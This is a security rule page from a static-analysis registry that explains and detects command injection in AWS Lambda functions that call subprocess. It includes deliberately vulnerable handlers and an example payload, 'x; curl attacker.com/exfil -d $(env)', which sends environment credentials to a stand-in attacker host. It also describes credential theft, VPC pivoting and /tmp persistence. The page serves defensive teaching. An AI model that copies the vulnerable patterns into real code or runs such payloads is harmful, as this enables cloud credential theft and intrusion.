# PYTHON-LAMBDA-SEC-002: Lambda Command Injection via subprocess

> **Severity:** CRITICAL | **CWE:** CWE-78 | **OWASP:** A03:2021

- **Language:** Python
- **Category:** AWS Lambda
- **URL:** https://codepathfinder.dev/registry/python/aws_lambda/PYTHON-LAMBDA-SEC-002
- **Detection:** `pathfinder scan --ruleset python/PYTHON-LAMBDA-SEC-002 --project .`

## Description

This rule detects OS command injection vulnerabilities in AWS Lambda functions where
untrusted event data flows into subprocess module calls (subprocess.run(),
subprocess.call(), subprocess.Popen(), subprocess.check_output()) either as a string
command with shell=True or embedded in a shell command string.

Lambda functions receive input from the event dictionary populated by API Gateway,
SQS, SNS, S3, DynamoDB Streams, and other triggers. Lambda itself applies no
sanitization between the raw event payload and application code, so event fields like
event.get("body"), event.get("queryStringParameters"), and event["Records"][0]["body"]
are fully attacker-controllable in public-facing deployments.

The subprocess module is safer than os.system() when used with a list argument and
shell=False (the default). However, two common patterns re-introduce shell injection
risk in Lambda handlers: passing event data as a string to subprocess.run() with
shell=True, and building a command string via f-string interpolation of event data
before passing it to a shell-backed call (any subprocess function with shell=True, or
subprocess.getoutput() and subprocess.getstatusoutput(), which always use the shell).
Both patterns cause the system shell to interpret metacharacters in the event data.
In a Lambda environment, successful injection immediately exposes the execution
role's temporary AWS credentials, which are available as environment variables.
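
The difference between the two invocation modes can be seen with a harmless payload. The following is a minimal sketch, assuming a POSIX environment where echo is on the PATH (as on the Lambda Linux runtimes); the payload string and variable names are illustrative only.

```python
import subprocess

# Illustrative stand-in for an attacker-controlled event field.
payload = "x; echo INJECTED"

# shell=True: the whole string is parsed by /bin/sh, so `;` ends the first
# command and the text after it runs as a second command.
shell_out = subprocess.run(
    f"echo {payload}", shell=True, capture_output=True, text=True
).stdout

# List form (shell=False): the payload is one argv entry and is never parsed.
list_out = subprocess.run(
    ["echo", payload], capture_output=True, text=True
).stdout

print(shell_out.splitlines())  # ['x', 'INJECTED']
print(list_out.splitlines())   # ['x; echo INJECTED']
```

In the shell case the second echo stands in for whatever command an attacker chooses; in the list case the same bytes are just text handed to the first program.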


## Vulnerable Code

```python
import subprocess

# SEC-002: subprocess with event data
def handler_subprocess(event, context):
    cmd = event.get('command')
    result = subprocess.call(cmd, shell=True)
    return {"statusCode": 200, "body": str(result)}


def handler_subprocess_popen(event, context):
    host = event.get('host')
    proc = subprocess.Popen(f"ping {host}", shell=True)
    return {"statusCode": 200}
```

## Secure Code

```python
import subprocess
import re
import json

def lambda_handler(event, context):
    # API Gateway sends body as None when the request has no payload
    body = json.loads(event.get('body') or '{}')
    width = body.get('width', '')
    height = body.get('height', '')
    filename = body.get('filename', '')

    # SECURE: Validate numeric inputs
    try:
        width = int(width)
        height = int(height)
    except (ValueError, TypeError):
        return {'statusCode': 400, 'body': 'Invalid dimensions'}

    # SECURE: Validate filename with strict regex (fullmatch also rejects a trailing newline)
    if not isinstance(filename, str) or not re.fullmatch(r'[a-zA-Z0-9_.\-]+', filename):
        return {'statusCode': 400, 'body': 'Invalid filename'}

    # SECURE: Use subprocess with list, no shell=True
    result = subprocess.run(
        ['convert', f'/tmp/{filename}', '-resize', f'{width}x{height}', f'/tmp/out_{filename}'],
        capture_output=True,
        text=True,
        timeout=30
    )
    # API Gateway proxy responses require body to be a string
    return {'statusCode': 200, 'body': json.dumps({'success': result.returncode == 0})}

```

## Detection Rule (Python SDK)

```python
from codepathfinder.python_decorators import python_rule
from codepathfinder import calls, flows, QueryType
from codepathfinder.presets import PropagationPresets

class SubprocessModule(QueryType):
    fqns = ["subprocess"]

# Lambda event sources — event dict is the primary untrusted input
_LAMBDA_SOURCES = [
    calls("event.get"),
    calls("event.items"),
    calls("event.values"),
    calls("event.keys"),
    calls("*.get"),
]


@python_rule(
    id="PYTHON-LAMBDA-SEC-002",
    name="Lambda Command Injection via subprocess",
    severity="CRITICAL",
    category="aws_lambda",
    cwe="CWE-78",
    tags="python,aws,lambda,command-injection,subprocess,OWASP-A03,CWE-78",
    message="Lambda event data flows to subprocess call. Use shlex.quote() or list args.",
    owasp="A03:2021",
)
def detect_lambda_subprocess():
    """Detects Lambda event data flowing to subprocess functions."""
    return flows(
        from_sources=_LAMBDA_SOURCES,
        to_sinks=[
            SubprocessModule.method("call", "check_call", "check_output",
                                    "run", "Popen", "getoutput", "getstatusoutput"),
        ],
        sanitized_by=[
            calls("shlex.quote"),
            calls("shlex.split"),
        ],
        propagates_through=PropagationPresets.standard(),
        scope="global",
    )
```

## How to Fix

- Always use subprocess with a list of arguments and shell=False (the default) to prevent the shell from interpreting metacharacters in event data.
- Never use shell=True when any part of the command string originates from the Lambda event dictionary.
- Validate all event fields against strict allowlists or regular expressions before they appear in any subprocess call.
- Consider replacing subprocess calls with native Python libraries via Lambda Layers to eliminate the shell attack surface entirely.
- Apply least-privilege IAM policies to the Lambda execution role to minimize the blast radius of successful exploitation.
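
As an illustration of the first three points, the ping handler from the vulnerable example could be reworked roughly as follows. This is a sketch under assumptions: the helper name build_ping_argv is hypothetical, the handler is assumed to accept only IPv4 literals, and a ping binary is assumed to exist in the function's runtime or a layer.

```python
import ipaddress
import subprocess


def build_ping_argv(host):
    """Return an argv list for ping, or raise ValueError for anything
    that is not a plain IPv4 literal (hypothetical helper)."""
    if not isinstance(host, str):
        raise ValueError("host must be a string")
    # IPv4Address rejects anything except dotted-quad notation, so shell
    # metacharacters and leading dashes never reach the command line.
    address = ipaddress.IPv4Address(host)
    return ["ping", "-c", "1", str(address)]


def handler(event, context):
    try:
        argv = build_ping_argv(event.get("host"))
    except ValueError:
        return {"statusCode": 400, "body": "Invalid host"}
    # List arguments with the default shell=False: no shell is involved.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return {"statusCode": 200, "body": str(result.returncode)}
```

Parsing the value into a typed object and re-serializing it, rather than pattern-matching the raw string, means only a canonical form ever reaches the command line.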

## Security Implications

- **AWS Credential Theft via Environment Variables:** Lambda execution environments expose AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,
and AWS_SESSION_TOKEN as environment variables. subprocess with shell=True and
injected event data enables an attacker to run env or read /proc/self/environ to
capture these credentials, then use them to call AWS APIs with the full permissions
of the Lambda's execution role.

- **Shell Metacharacter Injection:** When event data is interpolated into a shell command string, characters like `;`,
`|`, backticks, `$()`, `&&`, and `||` allow an attacker to append or chain arbitrary commands.
For example, `f"convert {event['filename']} output.jpg"` with filename set to
`"x; curl attacker.com/exfil -d $(env)"` executes the curl after the convert
regardless of whether convert succeeds.

- **Internal Network Access from VPC Lambda:** Lambda functions inside a VPC can reach internal subnets not accessible from
the internet. Command injection can be used to probe internal IP ranges, connect
to private RDS endpoints, or interact with internal APIs, pivoting from the
Lambda entry point to protected backend infrastructure.

- **Persistence via /tmp Modification:** The /tmp directory persists across warm invocations of the same execution
environment. An attacker can write scripts or binaries to /tmp, or overwrite files
the handler later loads or executes, so that the payload affects subsequent
invocations of the same warm environment. This creates a form of persistence that
lasts for the execution environment's lifetime.


## FAQ

**Q: When is subprocess safe in Lambda and when is it vulnerable?**

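subprocess is safe from shell injection when called with a list argument and
shell=False (the default). In list mode, the first element is the executable and the
remaining elements are arguments passed directly to execve() without shell
interpretation. It is vulnerable when shell=True is set with any string containing
event data, or when such a string is passed to subprocess.getoutput() or
subprocess.getstatusoutput(), which always run the command through the shell.
On POSIX, a string passed without shell=True is not parsed by a shell; it is treated
as the name of the program to execute, so event data in that position still lets an
attacker influence which binary runs.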


**Q: Does validating the event body before parsing protect against injection?**

Validation before use is the correct approach, but it must be applied to the
specific fields used in subprocess calls, not just to the top-level event body.
A JSON body that passes schema validation may still contain injection payloads
in nested fields. Validate each field individually with a strict regex or
allowlist immediately before it is used in a subprocess call.


**Q: What makes Lambda subprocess injection worse than in a traditional server?**

The execution role's temporary AWS credentials are automatically present as
environment variables in every Lambda invocation. Unlike a traditional server,
where credentials usually have to be located and stolen in a separate step, a
subprocess injection in Lambda immediately yields cloud credentials with the full
scope of the execution role. These credentials can be exfiltrated in the same
invocation via an outbound HTTP call, giving the attacker cloud access that outlives
the invocation and lasts until the temporary credentials expire.


**Q: Can I use shlex.quote() and keep shell=True for complex shell pipelines?**

shlex.quote() correctly escapes a single argument for shell inclusion, but it
must be applied to every individual argument. Even with correct shlex.quote()
usage, the preferred pattern is subprocess with a list and shell=False. For
pipelines, use subprocess.PIPE to chain multiple subprocess calls rather than
using shell=True.
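
A pipeline such as `grep ... | wc -l` can be expressed without a shell by connecting two processes directly. The sketch below assumes grep and wc are available on the PATH; the function name count_matching_lines is hypothetical.

```python
import subprocess


def count_matching_lines(text: str, needle: str) -> int:
    """Shell-free equivalent of: grep -F -- NEEDLE | wc -l (hypothetical helper)."""
    # -F treats the needle as a fixed string; "--" stops option parsing so a
    # needle that starts with "-" is not read as a flag.
    grep = subprocess.Popen(
        ["grep", "-F", "--", needle],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    # wc reads directly from grep's stdout; no shell sits in between.
    wc = subprocess.Popen(["wc", "-l"], stdin=grep.stdout, stdout=subprocess.PIPE)
    grep.stdout.close()  # the parent no longer needs its copy of the pipe end

    grep.stdin.write(text.encode())
    grep.stdin.close()

    out, _ = wc.communicate()
    grep.wait()
    return int(out.strip())
```

Because the needle travels as a single argv entry, shell syntax inside it (for example `$(env)`) is only ever compared as literal text.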


**Q: How do I handle Lambda functions that process S3 object keys via subprocess?**

S3 object keys are attacker-controlled when the S3 bucket accepts uploads from
external sources. Before using an S3 key in subprocess, validate it against a
strict regex that only allows expected characters. To prevent flag injection, pass
a standalone '--' argument before the key so that programs with conventional option
parsing treat it as an operand rather than an option. Consider using the boto3
S3 client to download the object to /tmp with a sanitized local filename rather
than passing the raw S3 key to subprocess.
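
The approach described above might look roughly like the following sketch. It rests on several assumptions that are not part of the rule: keys are expected to follow a hypothetical uploads/<name>.<ext> layout, the file utility stands in for whatever tool the function actually runs, and boto3 is available in the runtime. The helper name local_path_for is also hypothetical.

```python
import re
import subprocess
import uuid
from urllib.parse import unquote_plus

# Assumed key layout: uploads/<name>.png or uploads/<name>.jpg
_KEY_RE = re.compile(r"uploads/[A-Za-z0-9_-]{1,64}\.(?:png|jpg)")


def local_path_for(key):
    """Validate the S3 key and return a server-chosen /tmp path (hypothetical helper)."""
    if not isinstance(key, str) or not _KEY_RE.fullmatch(key):
        raise ValueError("unexpected S3 key")
    extension = key.rsplit(".", 1)[1]
    # The local name is generated here; no part of the key's name is reused.
    return f"/tmp/{uuid.uuid4().hex}.{extension}"


def handler(event, context):
    import boto3  # imported lazily so the helper above has no AWS dependency

    record = event["Records"][0]["s3"]
    bucket = record["bucket"]["name"]
    key = unquote_plus(record["object"]["key"])  # keys arrive URL-encoded
    try:
        path = local_path_for(key)
    except ValueError:
        return {"statusCode": 400, "body": "Invalid key"}

    boto3.client("s3").download_file(bucket, key, path)
    # List arguments, no shell; "--" marks the end of options.
    result = subprocess.run(
        ["file", "-b", "--", path], capture_output=True, text=True, timeout=10
    )
    return {"statusCode": 200, "body": result.stdout.strip()}
```

The raw key is only ever handed to the S3 API; the subprocess sees a path whose name the function generated itself.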


## References

- [CWE-78: OS Command Injection](https://cwe.mitre.org/data/definitions/78.html)
- [OWASP OS Command Injection Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)
- [Python subprocess Security Considerations](https://docs.python.org/3/library/subprocess.html#security-considerations)
- [AWS Lambda Security Best Practices](https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html)
- [OWASP Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
- [AWS Lambda Execution Environment](https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtime-environment.html)
